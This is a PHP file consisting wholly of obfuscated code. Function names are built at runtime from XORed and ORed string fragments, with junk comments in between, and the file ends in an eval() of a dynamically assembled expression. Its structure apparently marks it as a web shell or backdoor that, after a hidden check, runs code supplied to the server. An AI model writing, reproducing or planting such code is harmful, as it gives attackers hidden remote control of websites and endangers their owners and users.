<?php
$LVg96Pvgg='hruNHDHKW'&~j4c;$IJX3clh='<g"5-6H4l, '|'X%'.TDCEbV.'-an';$BN7iFDBF='6BD/)'./*'.
           '40*/K4EBCXIBVZ.'^,'._6C3ANUd.'`J%I&LI'^'A6"JO!Nxt"=>}7gcO$C|H/yi]S-Rq_}:';'nC'.
           '[w,qR~U';$EtN='+~+'&'m>k';$feSriWuEq='+@)'|"\$a.";$oq62oKKaXcy='PP@'|'@SR';/*'.
           'uCGO*/$dOMD9Mygq1='Te}eOr'&oftmBc;$ogNhy='@8)+y$/.'.B7G8^"0JLL&WZX.V0U";'GGoS'.
           'Up8J';$rpVj="g+k"^'*|%';$jvr0vFhKIv=A|"!";$WXrD2B9umV6=P|a;$BWA='XT]p_'&#dAcA'.
           'm^V__';$vk4PQ2=A|A;$vNCX9HZzT4="%"|A;$VaFr9z3='h_^P_^'._GKAVWK&NttR_Y_.'['./*'.
           'SZH&e[*/xKSOm;$gpY0Cc='DD@'|JC_;$EJBsGNr5=']T'&id;$TCAQvNM=(')'.MTCn.#_Hc0Z8g'.
           '#t)D{~'|oy6gXqhu.'#+6')&$IJX3clh;$uL1=(',2#'|'=5g')^$oq62oKKaXcy;'l7Gnbe2lqZz'.
           'A-H}2]+P';$N93EnKGvRJ=('"'.E0eDT|'!%0$,P')|$dOMD9Mygq1;$A03PF3Xl1S=(#sidOMbNh'.
           '%CQ % '.RZS6.'#I'^'S=>'.WzR5.'*=W@,')&$ogNhy;$Jd79u5un=$BN7iFDBF&('0</'./*A_s'.
           'S*/Iacgu2qhjgd59B6.'#  %.0?*I#X<2$'|'7,Di& BT[cq,r! k"3'.b13Q.'>0:2)5<538');/*'.
           '1=oN*/$YS=$rpVj^$EtN;$j_L=$jvr0vFhKIv&$WXrD2B9umV6;!$TCAQvNM($uL1(/*ynyOzF5DL'.
           ';)_*/$N93EnKGvRJ($BWA.$vk4PQ2)),$Jd79u5un)||$A03PF3Xl1S($feSriWuEq./*RljRmhlQ'.
           'Rf4YJsq{*/$vNCX9HZzT4,$YS,$j_L);eval($N93EnKGvRJ($VaFr9z3.$gpY0Cc./*KJvOWzMqK'.
           'G!b2*/$EJBsGNr5));#T{Lv-u|2[#I$PR8zXC^tQVY$w^R$s@4e)SLx:xQ;tI;aROf.(~V.hSXaI'.
           'TK6Av1K&**#k~4h}BsGoZY|oSJ^}cw(dJX,[&>J_f=';